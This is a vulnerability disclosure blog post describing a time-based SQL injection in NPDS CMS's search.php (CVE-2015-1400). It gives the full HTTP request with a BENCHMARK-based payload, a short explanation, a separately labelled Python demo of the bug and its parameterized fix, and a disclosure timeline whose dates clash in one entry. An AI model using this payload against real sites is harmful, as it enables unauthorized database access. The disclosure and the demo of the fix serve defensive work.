Hello folks! It has been a long time, I have not written up any finding for two months, so today I will share one of my findings: a time-based SQL injection in NPDS CMS.
What is NPDS CMS? Beyond "classic" content management, NPDS implements a set of functions specifically dedicated to managing communities and collaborative working groups.
It is a Content & Community Management System (CCMS) that is robust, secure, complete, efficient and really speaks French. Manage your community of users and your collaborative work groups, and publish, manage and organize your content with the powerful tools available in the base install.
You can find more about NPDS CMS at this link.
So let's come to the finding!
The vulnerability is straightforward and simple, as SQL injection usually is. While testing this CMS I found that the "search" POST parameter is vulnerable to time-based SQL injection. I think it is vulnerable to other injection types as well, but personally I like time-based SQL injection, so that is what I tested for.
Here is the HTTP request which I found to be vulnerable:
POST /npds/search.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/npds/index.php?op=edito
Cookie: admin=; pun_cookie_b03d0f=1%7C5c85108006f3ca4b272432a5be442deb43756d9c%7C1447517668%7C75fabcf00a72c6c06c40ec432c44c158a90fe85b; Elgg_install=0vsakk8pm4ksu1je3fp48krjv0; Elgg=8ojmn31jmhn2sntglokbokm0t1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 63
query=")and benchmark(20000000,sha1(1))--
======================================================
I performed the benchmark test for this, which was: ")and benchmark(20000000,sha1(1))--
BENCHMARK() is the best way to test for time-based SQL injection:
it forced the server to wait for about a second before responding, which confirmed to me that SQL injection is possible here.
Let us analyze it briefly.
Example
Back-end SQL query:
SELECT * FROM some_table WHERE example = [Injection point]
Our payload:
SELECT * FROM some_table WHERE example =")and benchmark(20000000,sha1(1))--
This causes the SQL server to wait for some seconds before sending the response.
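The concatenation bug behind this kind of finding, beside its parameterized fix, as an added example that is not code from this post or from NPDS. It assumes the search query has the shape WHERE example LIKE ('%input%') (single quotes, because SQLite, used here, reads double quotes as identifiers), emulates MySQL's BENCHMARK() and SHA1() with Python functions registered on the connection, lowers the iteration count so the run stays short, and uses a constructed two-row table.

```python
import hashlib
import sqlite3
import time

# The post's payload with the quote switched to ' (SQLite) and a smaller count.
PAYLOAD = "')and benchmark(500000,sha1(1))--"

def _sha1(value):
    # Stand-in for MySQL SHA1(): hex digest of the value's string form.
    return hashlib.sha1(str(value).encode()).hexdigest()

def _benchmark(count, value):
    # Stand-in for MySQL BENCHMARK(): hashes `value` `count` times, returns 0.
    data = str(value).encode()
    for _ in range(int(count)):
        hashlib.sha1(data).digest()
    return 0

def make_db():
    # Constructed in-memory table playing the role of the CMS search table.
    conn = sqlite3.connect(":memory:")
    conn.create_function("sha1", 1, _sha1)
    conn.create_function("benchmark", 2, _benchmark)
    conn.execute("CREATE TABLE some_table (id INTEGER, example TEXT)")
    conn.executemany("INSERT INTO some_table VALUES (?, ?)",
                     [(1, "npds"), (2, "security")])
    return conn

def _timed(conn, sql, params=()):
    # Returns (row count, seconds taken): the two things a tester watches.
    start = time.perf_counter()
    rows = conn.execute(sql, params).fetchall()
    return len(rows), time.perf_counter() - start

def vulnerable_search(conn, user_input):
    # Concatenation: the input is parsed as SQL. The payload's ') closes the
    # pattern and the parenthesis, "and benchmark(...)" then runs for every
    # row the now-trivial '%' pattern matches, and -- comments out the rest.
    sql = f"SELECT * FROM some_table WHERE example LIKE ('%{user_input}%')"
    return _timed(conn, sql)

def safe_search(conn, user_input):
    # Bound parameter: the same bytes become part of the pattern value only.
    sql = "SELECT * FROM some_table WHERE example LIKE ('%' || ? || '%')"
    return _timed(conn, sql, (user_input,))

def delay_detected(conn, search, user_input, baseline="npds", factor=10.0):
    # Time-based check: the probe must be far slower than a benign search and
    # above an absolute floor, so timing noise alone does not trigger it.
    _, base = search(conn, baseline)
    _, probe = search(conn, user_input)
    return probe > 0.05 and probe > base * factor
```

Running delay_detected with vulnerable_search shows the delay; with safe_search the same input returns instantly with zero rows.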
This was a simple finding, as you can see =D !
=================================================================================
Reporting Time Line
Reported To Vendor - 14-12-2014
Verified By Vendor - 15-12-2014
Acknowledged By Vendor - 25-1-2015
Public Disclosure By Vendor - 25-1-2014
Technical Disclosure - 25-1-2015
Vendor Security Advisory - http://www.npds.org/viewtopic.php?topic=26233&forum=12
CVE ID - CVE-2015-1400
Mitigation For This Vulnerability - There is no update from the vendor yet, but one will be out soon!
So this was all about the NPDS CMS SQL injection.
Thanks for reading! Comments are always welcome :)